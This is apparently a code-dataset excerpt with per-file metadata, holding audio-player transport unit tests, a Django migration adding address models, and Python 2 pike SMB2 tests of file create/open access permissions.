                # Allow test case to sync the end of the test
                done.set(),
            ),
        ),
    )
    # Kick off test and wait for it
    t, p = create_transport(self, expects)
    t.new_source(src)
    self.assertTrue(done.wait(5), 'timeout waiting for test to finish')
    # BUGFIX: message said "second run" but this test has a single run
    self.assertTrue(p.wait(5), 'timeout waiting for state to update')
    # Check final state
    expects.done()
    self.assertEqual(t.state.state, player.State.STOP)
def test_pause_after_track(self):
    """A packet flagged PAUSE_AFTER should pause the transport at the
    end of its track; a subsequent play() continues with the next
    track and the disc plays to the end.
    """
    # Two tracks of two packets each, pause after the first one
    src = DummySource('disc1', 2, 2, 1)
    # Wait for test to finish on an event
    done = threading.Event()
    expects = DummySink(
        self,
        Expect('start', 'should call start on new disc',
            checks = lambda format: (
                self.assertIs(format, model.PCM),
                self.assertIs(t.state.state, player.State.WORKING,
                    'state should be WORKING before any packets have been read'),
            ),
        ),
        Expect('add_packet', 'should add first packet',
            checks = lambda packet, offset: (
                self.assertEqual(offset, 0),
                self.assertIs(t.state.state, player.State.PLAY),
                self.assertEqual(t.state.track, 1),
                self.assertEqual(t.state.position, 0),
            ),
            ret = lambda packet, offset: (len(packet.data), packet, None),
        ),
        Expect('add_packet', 'should add second packet',
            checks = lambda packet, offset: (
                self.assertEqual(offset, 0),
                self.assertEqual(packet.abs_pos, 1 * model.PCM.rate, 'should be second packet'),
                self.assertEqual(packet.flags, packet.PAUSE_AFTER,
                    'packet should tell transport to pause'),
            ),
            ret = lambda packet, offset: (len(packet.data), packet, None),
        ),
        Expect('drain', 'drain should be called when pausing after track',
            checks = lambda: (
                self.assertIs(t.state.state, player.State.PLAY),
                self.assertEqual(t.state.track, 1),
                self.assertEqual(t.state.position, 1, "position should be second packet"),
                # Allow test to detect that state has updated
                p.clear(),
            ),
            # Tell transport that buffer is empty
            ret = lambda: None,
        ),
        Expect('stop', 'should call stop when pausing after track',
            checks = lambda: (
                # Allow test case to sync the middle of the test
                done.set(),
            ),
        ),
        Expect('start', 'should call start on play',
            checks = lambda format: (
                self.assertIs(format, model.PCM),
                self.assertIs(t.state.state, player.State.WORKING,
                    'state should be WORKING before any packets have been read'),
                self.assertEqual(t.state.track, 2, 'should start playing second track'),
            ),
        ),
        Expect('add_packet', 'should add first packet in second track',
            checks = lambda packet, offset: (
                self.assertEqual(offset, 0),
                # State should have been updated
                self.assertIs(t.state.state, player.State.PLAY),
                self.assertEqual(t.state.track, 2),
            ),
            ret = lambda packet, offset: (len(packet.data), packet, None),
        ),
        Expect('add_packet', 'should add second packet in second track',
            checks = lambda packet, offset: (
                self.assertEqual(offset, 0),
                self.assertEqual(packet.abs_pos, 1 * model.PCM.rate, 'should be second packet'),
            ),
            ret = lambda packet, offset: (len(packet.data), packet, None),
        ),
        Expect('drain', 'drain final track',
            checks = lambda: (
                # Allow test to detect that state has updated
                p.clear(),
            ),
            # Tell transport that buffer is empty
            ret = lambda: None,
        ),
        Expect('stop', 'should call stop at end of disc',
            checks = lambda: (
                # Allow test case to sync the end of the test
                done.set(),
            ),
        ),
    )
    # Kick off test and wait for it
    t, p = create_transport(self, expects)
    t.new_source(src)
    self.assertTrue(done.wait(5), 'timeout waiting for first run to finish')
    self.assertTrue(p.wait(5), 'timeout waiting for first run state to update')
    self.assertEqual(t.state.state, player.State.PAUSE,
        'transport should be paused at end of first track')
    # BUGFIX: the two asserts below had stray trailing commas, turning
    # each statement into a throwaway one-element tuple
    self.assertEqual(t.state.track, 1)
    self.assertEqual(t.state.position, 1, "position should be second packet")
    # Now hit play to keep playing second track
    done.clear()
    t.play()
    # Wait for second run to finish
    self.assertTrue(done.wait(5), 'timeout waiting for second run to finish')
    self.assertTrue(p.wait(5), 'timeout waiting for second run state to update')
    # Check final state
    expects.done()
    self.assertEqual(t.state.state, player.State.STOP,
        'transport should stop at end of disc')
def test_device_error_without_packet(self):
    """When the sink reports an error without consuming any bytes, the
    transport should record the error in state.error and retry the
    same packet from the same offset.
    """
    # Single track with lots of packets
    src = DummySource('disc1', 1)
    # Wait for test to finish on an event
    done = threading.Event()
    expects = DummySink(
        self,
        Expect('start', 'should call start on new disc',
            checks = lambda format: (
                self.assertIs(t.state.state, player.State.WORKING,
                    'state should be WORKING before any packets have been read'),
            ),
        ),
        Expect('add_packet', 'should add first packet, and get error in response',
            checks = lambda packet, offset: (
                self.assertIs(t.state.state, player.State.PLAY,
                    'state should be PLAY when we stop()'),
            ),
            # Consume nothing and report a device error
            ret = lambda packet, offset: (0, None, 'foobar'),
        ),
        Expect('add_packet', 'should retry first packet after error',
            checks = lambda packet, offset: (
                self.assertEqual(packet.abs_pos, 0, 'should be first packet'),
                self.assertEqual(offset, 0),
                self.assertEqual(t.state.error, 'Audio sink error: foobar',
                    'state.error should be set'),
                # Now stop, so test doesn't run away
                # (BUGFIX: a duplicated copy of this PLAY assertion was removed)
                self.assertIs(t.state.state, player.State.PLAY,
                    'state should be PLAY when we stop()'),
                # Allow test to detect that state has updated
                p.clear(),
                # Tell the transport to stop
                t.stop(),
                self.assertIs(t.state.state, player.State.STOP,
                    'state should be STOP immediately, since this is a disruptive change'),
            ),
            ret = lambda packet, offset: (len(packet.data), packet, None),
        ),
        Expect('stop', 'should be told to stop by transport',
            checks = lambda: (
                # Allow test case to sync the end of the test
                done.set(),
            ),
        ),
    )
    # Kick off test and wait for it
    t, p = create_transport(self, expects)
    t.new_source(src)
    self.assertTrue(done.wait(5), 'timeout waiting for test to finish')
    # BUGFIX: message said "second run" but this test has a single run
    self.assertTrue(p.wait(5), 'timeout waiting for state to update')
    # Check final state
    expects.done()
    self.assertEqual(t.state.state, player.State.STOP)
| 40.434077
| 108
| 0.502609
| 6,363
| 59,802
| 4.686311
| 0.047462
| 0.033603
| 0.051511
| 0.067608
| 0.867199
| 0.853114
| 0.846876
| 0.830678
| 0.821389
| 0.81542
| 0
| 0.006726
| 0.405772
| 59,802
| 1,478
| 109
| 40.461434
| 0.832395
| 0.085733
| 0
| 0.773529
| 0
| 0
| 0.199824
| 0.00055
| 0
| 0
| 0
| 0
| 0.261765
| 1
| 0.033333
| false
| 0.00098
| 0.011765
| 0.003922
| 0.061765
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f25cfb5b20460f8317f3839c6e7302293d63d381
| 1,925
|
py
|
Python
|
experiment/sale/migrations/0002_auto_20200612_1705.py
|
rob-atlas/atlasparts
|
8d4704f8734945fbcd99baa5bd0f20cd930e814f
|
[
"MIT"
] | null | null | null |
experiment/sale/migrations/0002_auto_20200612_1705.py
|
rob-atlas/atlasparts
|
8d4704f8734945fbcd99baa5bd0f20cd930e814f
|
[
"MIT"
] | 6
|
2020-06-06T00:04:02.000Z
|
2021-09-22T19:05:03.000Z
|
experiment/sale/migrations/0002_auto_20200612_1705.py
|
rob-atlas/atlasparts
|
8d4704f8734945fbcd99baa5bd0f20cd930e814f
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.0 on 2020-06-12 07:05
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated by Django 3.0 on 2020-06-12 07:05.
    # Adds two standalone address tables (UnleashedShippingAddress,
    # UnleashedVenueAddress) and two optional text fields on the
    # existing UnleashedSalesOrder model.

    # Must be applied after the app's initial migration.
    dependencies = [
        ('sale', '0001_initial'),
    ]

    operations = [
        # New table: shipping address as received from the Unleashed API.
        # All fields nullable since the upstream data may be incomplete.
        migrations.CreateModel(
            name='UnleashedShippingAddress',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('company', models.CharField(max_length=50, null=True)),
                ('street', models.CharField(max_length=50, null=True)),
                ('town', models.CharField(max_length=50, null=True)),
                ('state', models.CharField(max_length=50, null=True)),
                ('postcode', models.CharField(max_length=8, null=True)),
                ('country', models.CharField(max_length=50, null=True)),
            ],
        ),
        # New table: venue address, same field layout as the shipping address.
        migrations.CreateModel(
            name='UnleashedVenueAddress',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('company', models.CharField(max_length=50, null=True)),
                ('street', models.CharField(max_length=50, null=True)),
                ('town', models.CharField(max_length=50, null=True)),
                ('state', models.CharField(max_length=50, null=True)),
                ('postcode', models.CharField(max_length=8, null=True)),
                ('country', models.CharField(max_length=50, null=True)),
            ],
        ),
        # New optional columns on the existing sales-order table.
        migrations.AddField(
            model_name='unleashedsalesorder',
            name='customer_reference',
            field=models.CharField(max_length=20, null=True),
        ),
        migrations.AddField(
            model_name='unleashedsalesorder',
            name='delivery_name',
            field=models.CharField(max_length=20, null=True),
        ),
    ]
| 40.104167
| 114
| 0.572468
| 192
| 1,925
| 5.609375
| 0.302083
| 0.194986
| 0.233983
| 0.311978
| 0.766945
| 0.766945
| 0.766945
| 0.766945
| 0.610956
| 0.610956
| 0
| 0.032093
| 0.287792
| 1,925
| 47
| 115
| 40.957447
| 0.753465
| 0.022338
| 0
| 0.731707
| 1
| 0
| 0.112766
| 0.023936
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.02439
| 0
| 0.097561
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f277d3b74c3e5aa423c3e824b9a5302e6e0499ec
| 62,950
|
py
|
Python
|
test/create_open_file_additional.py
|
abhilashabhardwaj/pike
|
a1ad05b37231d8ac0a0442ab8d32a363e75ada9a
|
[
"Apache-2.0"
] | null | null | null |
test/create_open_file_additional.py
|
abhilashabhardwaj/pike
|
a1ad05b37231d8ac0a0442ab8d32a363e75ada9a
|
[
"Apache-2.0"
] | null | null | null |
test/create_open_file_additional.py
|
abhilashabhardwaj/pike
|
a1ad05b37231d8ac0a0442ab8d32a363e75ada9a
|
[
"Apache-2.0"
] | null | null | null |
#Copyright (C) Calsoft. All rights reserved.
#
# Module Name:
#
# create_open_additional.py
#
# Abstract:
#
# Additional test cases of Create open file
#
# Authors: Prayas Gupta (prayas.gupta@calsoftinc.com)
#
import pike.smb2
import pike.model
import pike.test
import re
import random
import array
import utils
class CreateOpen(pike.test.PikeTest):
def __init__(self, *args, **kwargs):
    # Delegate standard test-case setup, then define the payload that
    # every test case writes to (and reads back from) its test file.
    super(CreateOpen, self).__init__(*args, **kwargs)
    self.buffer = "testing123456"
def test_open_file_append(self):
try:
print "----------------------------------"
print "TC001 - Open a file for append and try to read it.Should have read persmissions"
expected_status = 'STATUS_SUCCESS'
print "Expected status: ",expected_status
print "Creating session and treeconnect"
chan, tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating file"
file_handle = chan.create(tree,'create001.txt', access=pike.smb2.FILE_READ_DATA|pike.smb2.FILE_WRITE_DATA, options=pike.smb2.FILE_NON_DIRECTORY_FILE,disposition=pike.smb2.FILE_OPEN_IF).result()
print "File creation successful"
print "Writing data into file"
bytes_written = chan.write(file_handle,0,self.buffer)
print "Data write successful"
print "Trying to read data"
bytes_read = chan.read(file_handle,len(self.buffer),0)
print "Read data successful"
print "Close the handle"
chan.close(file_handle)
print "File handle closed successfully"
print "Matching Bytes_read and Buffer length"
if len(bytes_read) == len(self.buffer):
actual_status = 'STATUS_SUCCESS'
except Exception as e:
actual_status = str(e)
print "Actual status:",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "TC001 has passed"
def test_open_file_without_read(self):
try:
print "----------------------------------"
print "TC002 - Open a file for append without read permissions. Try to read from the file."
expected_status = 'STATUS_ACCESS_DENIED'
print "Expected status: ",expected_status
print "Creating session and treeconnect"
chan, tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating file"
file_handle = chan.create(tree,'create002.txt', access=pike.smb2.FILE_WRITE_DATA, options=pike.smb2.FILE_NON_DIRECTORY_FILE,disposition=pike.smb2.FILE_OPEN_IF).result()
print "File creation successful"
print "Writing data into file"
bytes_written = chan.write(file_handle,0,self.buffer)
print "Data write successful"
print "Trying to read data"
bytes_read = chan.read(file_handle,len(self.buffer),0)
print "Read data successful"
print "Close the handle"
chan.close(file_handle)
print "File handle closed successfully"
except Exception as e:
actual_status = str(e)
print "Actual status:",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "TC002 has passed"
def test_open_file_execute(self):
try:
print "------------------------------------"
print "TC003 - open a file with execute and read it."
expected_status = 'STATUS_SUCCESS'
print "Expected status: ",expected_status
print "Creating session and treeconnect"
chan, tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating file"
file_handle = chan.create(tree,'Create003.txt',access=pike.smb2.FILE_WRITE_DATA ,disposition=pike.smb2.FILE_CREATE,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "File creation successful"
print "Writing data into file"
bytes_written = chan.write(file_handle,0,self.buffer)
print "Data write successful"
print "Close the handle"
chan.close(file_handle)
print "File handle closed successfully"
print "Opening file with FILE_EXECUTE"
file_handle1 = chan.create(tree,'Create003.txt',access=pike.smb2.FILE_EXECUTE,disposition=pike.smb2.FILE_OPEN,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "Opening file successful"
print "Trying to read data"
bytes_read = chan.read(file_handle1,len(self.buffer),0)
print "Read data successful"
print "Close the handle"
chan.close(file_handle1)
print "File handle closed successfully"
print "Matching Bytesread and buffer length"
if len(bytes_read) == len(self.buffer):
actual_status = 'STATUS_SUCCESS'
except Exception as e:
actual_status = str(e)
print "Actual status:",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "TC003 has passed"
def test_open_file_readattr(self):
try:
print "-------------------------------------"
print "TC004 - Open a file for read attr and try to read from the file"
expected_status = 'STATUS_SUCCESS'
print "Expected status: ",expected_status
print "Creating session and treeconnect"
chan, tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating file"
file_handle = chan.create(tree,'Create004.txt',access=pike.smb2.FILE_READ_ATTRIBUTES|pike.smb2.FILE_READ_DATA,disposition=pike.smb2.FILE_OPEN_IF,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "File creation successful"
print "Querying the file"
conv_obj = utils.Convenience()
query_packet = conv_obj.query_file_info(chan, file_handle, pike.smb2.FILE_ALL_INFORMATION)
res = conv_obj.transceive(chan,query_packet)
info = res[0]
#info = chan.query_file_info(file_handle,pike.smb2.FILE_ALL_INFORMATION)
print "Querying file is successful"
print "Close the handle"
chan.close(file_handle)
print "File handle closed successfully"
actual_status = str(info.status)
except Exception as e:
actual_status = str(e)
print "Actual status:",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "TC004 has passed"
def test_open_file_read_sync(self):
try:
print "--------------------------------------"
print "TC 005 - Open with read and sync set . Server should ignore sync and allow read."
expected_status = "STATUS_SUCCESS"
print "Expected status: ",expected_status
print "Creating session and treeconnect"
chan,tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating file"
file_handle = chan.create(tree,'Create005.txt',access = pike.smb2.FILE_READ_DATA|pike.smb2.SYNCHRONIZE|pike.smb2.FILE_WRITE_DATA,disposition=pike.smb2.FILE_OPEN_IF,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "File creation successful"
print "Writing data into file"
bytes_written = chan.write(file_handle,0,self.buffer)
print "Data write successful"
print "Trying to read data"
bytes_read = chan.read(file_handle,len(self.buffer),0)
print "Read data successful"
print "Close the handle"
chan.close(file_handle)
print "File handle closed successfully"
print "Matching Bytesread and buffer length"
if len(bytes_read) == len(self.buffer):
actual_status = 'STATUS_SUCCESS'
except Exception as e:
actual_status = str(e)
print "Actual status:",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "TC005 has passed"
def test_open_file_all_cases(self):
try:
print "----------------------------------------"
print "TC006 - Open for all cases with desired access set to 0.See the server response."
expected_status = "STATUS_ACCESS_DENIED"
print "Expected status: ",expected_status
print "Creating session and treeconnect"
chan,tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating file"
file_handle = chan.create(tree,'Create006.txt',access = 0,disposition=pike.smb2.FILE_OPEN_IF,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "File creation successful"
print "If file handle exists"
if isinstance(file_handle,pike.model.Open):
actual_status = "STATUS_SUCCESS"
print "Close the handle"
chan.close(file_handle)
print "File handle closed successfully"
except Exception as e:
actual_status = str(e)
print "Actual status:",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "TC006 has passed"
def test_open_file_maxallowed_ro(self):
try:
print "-----------------------------------------"
print "TC007 - Open with Max_allowed flag on a RO file.Try writing data on the file"
expected_status = "STATUS_ACCESS_DENIED"
print "Expected status: ",expected_status
print "Creating session and treeconnect"
chan,tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating file"
file_handle = chan.create(tree,'Create007.txt',access =pike.smb2.MAXIMUM_ALLOWED,disposition=pike.smb2.FILE_CREATE,options=pike.smb2.FILE_NON_DIRECTORY_FILE,attributes=pike.smb2.FILE_ATTRIBUTE_READONLY).result()
print "File creation successful"
print "Querying the file"
info = chan.query_file_info(file_handle,pike.smb2.FILE_ALL_INFORMATION)
print "Querying is successful"
file_attr = info.basic_information.file_attributes
print "File attribute is :",file_attr
print "Close the handle"
chan.close(file_handle)
print "File handle closed successfully"
print "Opening the file"
file_handle2 = chan.create(tree,'Create007.txt',access =pike.smb2.MAXIMUM_ALLOWED,disposition=pike.smb2.FILE_OPEN,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "Opening file is successful"
print "Trying to write data"
bytes_written = chan.write(file_handle2,0,self.buffer)
print "Write data successful"
print "Trying to read data"
bytes_read = chan.read(file_handle2,len(self.buffer),0)
print "Read data successful"
print "Matching Byteswritten and Bytesread with buffer length"
if bytes_written == len(self.buffer) and len(bytes_read) == len(self.buffer):
actual_status = "STATUS_SUCCESS"
print "Close the second handle"
chan.close(file_handle2)
print "Second handle closed successfully"
except Exception as e:
actual_status = str(e)
print "Actual status:",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "TC007 has passed"
def test_open_file_maxallowed_wo(self):
try:
print "------------------------------------------"
print "TC008 - Open a RO file with write permissions and try writing data "
expected_status = 'STATUS_ACCESS_DENIED'
print "Expected status: ",expected_status
print "Creating session and treeconnect"
chan,tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating file"
file_handle = chan.create(tree,'Create008.txt',access =pike.smb2.FILE_WRITE_DATA,disposition=pike.smb2.FILE_CREATE,options=pike.smb2.FILE_NON_DIRECTORY_FILE,attributes=pike.smb2.FILE_ATTRIBUTE_READONLY).result()
print "File creation successful"
print "Close the handle"
chan.close(file_handle)
print "File handle closed successfully"
print "Opening the file"
file_handle2 = chan.create(tree,'Create008.txt',access =pike.smb2.FILE_WRITE_DATA,disposition=pike.smb2.FILE_OPEN,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "Opening file is successful"
print "Trying to write data"
bytes_written = chan.write(file_handle2,0,self.buffer)
print "Write data successful"
print "Close the second handle"
chan.close(file_handle2)
print "Second handle closed successfully"
except Exception as e:
actual_status = str(e)
print "Actual status:",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "TC008 has passed"
def test_open_file_appenddata(self):
buffer2 = "@calsoft"
try:
print "----------------------------------------------"
print "TC009 - Open a file for append and append data"
expected_status = 'STATUS_SUCCESS'
print "Expected status: ",expected_status
print "Creating session and treeconnect"
chan,tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating file"
file_handle = chan.create(tree,'Create009.txt',access = pike.smb2.FILE_APPEND_DATA,disposition = pike.smb2.FILE_CREATE,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "File creation successful"
print "Trying to write data"
bytes_written = chan.write(file_handle,0,self.buffer)
print "Write data successful"
print "Close first handle"
chan.close(file_handle)
print "First handle closed successfully"
print "Opening the file"
file_handle2 = chan.create(tree,'Create009.txt',access = pike.smb2.FILE_APPEND_DATA,disposition = pike.smb2.FILE_OPEN,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "File opening successful"
print "Trying to append data"
bytes_written2 = chan.write(file_handle2,len(self.buffer),buffer2)
print "Append data successful"
final_buffer = len(self.buffer) + len(buffer2)
print "The final buffer length is :",final_buffer
final_bytes_written = int(bytes_written + bytes_written2)
print "The final buffer written length is :",final_bytes_written
print "Checking final buffer length and final buffer written length is equal or not"
if final_buffer == final_bytes_written:
actual_status = 'STATUS_SUCCESS'
print "Close the second handle"
chan.close(file_handle2)
print "Second handle closed successful"
except Exception as e:
actual_status = str(e)
print "Actual status:",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "TC009 has passed"
def test_open_file_write_ea(self):
try:
print "--------------------------------------"
print "TC 010 - Open a file that does not have permission to write-ea for write-ea "
easize = 0
expected_status = str(easize)
print "Expected status: ",expected_status
conv_obj=utils.Convenience()
print "Creating session and treeconnect"
chan,tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating and opening file"
create_tmp,create_resp = conv_obj.create(chan,tree,'Create10.txt',
access=pike.smb2.FILE_READ_EA | pike.smb2.FILE_READ_ATTRIBUTES,
attributes=pike.smb2.FILE_ATTRIBUTE_NORMAL,
disposition=pike.smb2.FILE_OPEN_IF,
options=pike.smb2.FILE_NON_DIRECTORY_FILE,
extended_attr={"Author":"Prayas"})
file = create_tmp.result()
print "File opening successful"
print "Querying the file and checking EA size value"
info = chan.query_file_info(file,pike.smb2.FILE_ALL_INFORMATION)
ea_size = info.ea_information.ea_size
print "The ea size of file is :",ea_size
actual_status = str(ea_size)
except Exception as e:
actual_status = str(e)
print "Actual status:",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "TC010 has passed"
def test_open_file_readattributes(self):
try:
print "-----------------------------------------"
print "TC 011 - Open a file to read attributes that has the proper permissions i.e FILE_READ_ATTRIBUTES."
expected_status = "FILE_ATTRIBUTE_ARCHIVE"
print "Expected status: ",expected_status
print "Creating session and treeconnect"
chan,tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating and opening file"
file_handle = chan.create(tree,'Create011.txt',access = pike.smb2.FILE_READ_ATTRIBUTES,disposition = pike.smb2.FILE_OPEN_IF,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "File opening successful"
print "Reading file-attribute"
conv_obj = utils.Convenience()
query_packet = conv_obj.query_file_info(chan, file_handle, pike.smb2.FILE_ALL_INFORMATION)
res = conv_obj.transceive(chan,query_packet)
info = res[0]
file_attribute = info.children[0][0].basic_information.file_attributes
print "The file attributes is :",file_attribute
actual_status = str(file_attribute)
print "Close the file handle"
chan.close(file_handle)
print "File handle closed successful"
except Exception as e:
actual_status = str(e)
print "Actual status:",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "TC011 has passed"
def test_open_file_without_readattributes(self):
try:
print "-----------------------------------------"
print "TC 012 - Open a file which does NOT have read attribute permission, and try to read attributes."
expected_status = "STATUS_ACCESS_DENIED"
print "Expected status: ",expected_status
print "Creating session and treeconnect"
chan,tree = self.tree_connect()
conv_obj = utils.Convenience()
print "Session and treeconnect successful"
print "Creating and opening file"
file_handle = chan.create(tree,'Create012.txt',access = pike.smb2.FILE_WRITE_ATTRIBUTES,disposition = pike.smb2.FILE_OPEN_IF,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "File opening successful"
print "Trying to read attributes"
query_packet = conv_obj.query_file_info(chan, file_handle, pike.smb2.FILE_ALL_INFORMATION)
res = conv_obj.transceive(chan, query_packet)
info = res[0]
file_attribute = info.children[0][0].basic_information.file_attributes
print "The file attributes is :",file_attribute
actual_status = str(info.status)
print "Close the file handle"
chan.close(file_handle)
print "File handle closed successful"
except Exception as e:
actual_status = str(e)
print "Actual status:",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "TC012 has passed"
def test_open_file_writeattributes(self):
try:
print "-------------------------------------------"
print "TC 013 - Open a file with perms(FILE_WRITE_ATTRIBUTES) to change attributes. Change some attribute of the file and save"
expected_status = "FILE_ATTRIBUTE_READONLY"
print "Expected status: ",expected_status
print "Creating session and treeconnect"
chan,tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating and opening file"
file_handle = chan.create(tree,'Create013.txt',access = pike.smb2.FILE_WRITE_ATTRIBUTES|pike.smb2.FILE_READ_ATTRIBUTES,disposition = pike.smb2.FILE_OPEN_IF,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "File opening successful"
print "Trying to read the file attribute"
info = chan.query_file_info(file_handle,pike.smb2.FILE_ALL_INFORMATION)
file_create_attribute_old = info.basic_information.file_attributes
print "When file created file-attribute is :",file_create_attribute_old
print "Changing file-attribute to FILE_ATTRIBUTE_READONLY"
with chan.set_file_info(file_handle, pike.smb2.FileBasicInformation) as file_info:
file_info.file_attributes = pike.smb2.FILE_ATTRIBUTE_READONLY
print "Checking file for changed attribute"
info1 = chan.query_file_info(file_handle,pike.smb2.FILE_ALL_INFORMATION)
file_create_attribute_new = info1.basic_information.file_attributes
print "The changed attribute is : ",file_create_attribute_new
actual_status =str(file_create_attribute_new)
print "Close the file handle"
chan.close(file_handle)
print "File handle closed successful"
except Exception as e:
actual_status = str(e)
print "Actual status",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "TC013 has passed"
def test_open_file_without_writeattributes(self):
try:
print "-------------------------------------------"
print "TC 014 - Open a file which doesn't have perms(FILE_WRITE_ATTRIBUTES) to change attributes"
expected_status = "STATUS_ACCESS_DENIED"
print "Expected status: ",expected_status
print "Creating session and treeconnect"
chan,tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating and opening file"
file_handle = chan.create(tree,'Create014.txt',access = pike.smb2.FILE_READ_ATTRIBUTES,disposition = pike.smb2.FILE_OPEN_IF,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "File opening successful"
print "Reading the file attribute"
info = chan.query_file_info(file_handle,pike.smb2.FILE_ALL_INFORMATION)
file_create_attribute = info.basic_information.file_attributes
print "When file created file attribute is :",file_create_attribute
print "Trying to change file attribute"
with chan.set_file_info(file_handle, pike.smb2.FileBasicInformation) as file_info:
file_info.file_attributes = pike.smb2.FILE_ATTRIBUTE_READONLY
print "Close the file handle"
chan.close(file_handle)
print "File handle closed successful"
except Exception as e:
actual_status = str(e)
print "Actual status:",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "TC014 has passed"
def test_open_file_synchronize(self):
try:
print "-------------------------------------------"
print "TC 015 - Open a file with SYNCHRONIZE flag and verify server ignores this flag"
expected_status = "SYNCHRONIZE | FILE_READ_ATTRIBUTES"
print "Expected status: ",expected_status
print "Creating session and treeconnect"
chan,tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating and opening file"
file_handle = chan.create(tree,'Create015.txt',access = pike.smb2.SYNCHRONIZE | pike.smb2.FILE_READ_ATTRIBUTES,disposition = pike.smb2.FILE_OPEN_IF,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "File opening successful"
print "Reading desired access of file"
info = chan.query_file_info(file_handle,pike.smb2.FILE_ALL_INFORMATION)
file_desired_access = info.access_information.access_flags
print "The file got created and opened ignoring Desired access(SYNCHRONIZE) flag",file_desired_access
actual_status = str(file_desired_access)
print "Close the file handle"
chan.close(file_handle)
print "File handle closed successful"
except Exception as e:
actual_status = str(e)
print "Actual Status:",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "TC015 has passed"
def test_open_file_read_max_allowed(self):
buffer1 = "Calsoft"
try:
print "------------------------------------------"
print "TC 016 - Open a file that has file attribute = READONLY and desired access with maximum allowed and verify that only read is allowed and write fails"
expected_status = "STATUS_ACCESS_DENIED"
print "Expected status: ",expected_status
print "Creating session and treeconnect"
chan,tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating file"
file_handle = chan.create(tree,'Create016.txt',access = pike.smb2.MAXIMUM_ALLOWED,disposition = pike.smb2.FILE_CREATE,options=pike.smb2.FILE_NON_DIRECTORY_FILE,attributes=pike.smb2.FILE_ATTRIBUTE_READONLY).result()
print "File creation successful"
print "Writing data into file"
bytes_written = chan.write(file_handle,0,self.buffer)
print "Buffer writing successful"
print "Close the file handle"
chan.close(file_handle)
print "File handle closed successful"
print "Opening file"
file_handle1 = chan.create(tree,'Create016.txt',access = pike.smb2.MAXIMUM_ALLOWED,disposition = pike.smb2.FILE_OPEN,options=pike.smb2.FILE_NON_DIRECTORY_FILE,attributes=pike.smb2.FILE_ATTRIBUTE_READONLY).result()
print "File opening successful"
print "Trying to read data"
bytes_read = chan.read(file_handle1,len(self.buffer),0)
if len(bytes_read) == len(self.buffer):
print "Read data successful"
print "Trying to write data into file when file is open with attribute = FILE_ATTRIBUTE_READONLY"
bytes_written1 = chan.write(file_handle1,0,buffer1)
if bytes_written1 == len(buffer1):
print "Bytes write is successful"
actual_status = "STATUS_SUCCESS"
print "Close the second file handle"
chan.close(file_handle1)
print "Second file handle closed successfully"
except Exception as e:
actual_status = str(e)
print "Actual Status:",actual_status
print "Matching actual_status and expected_status"
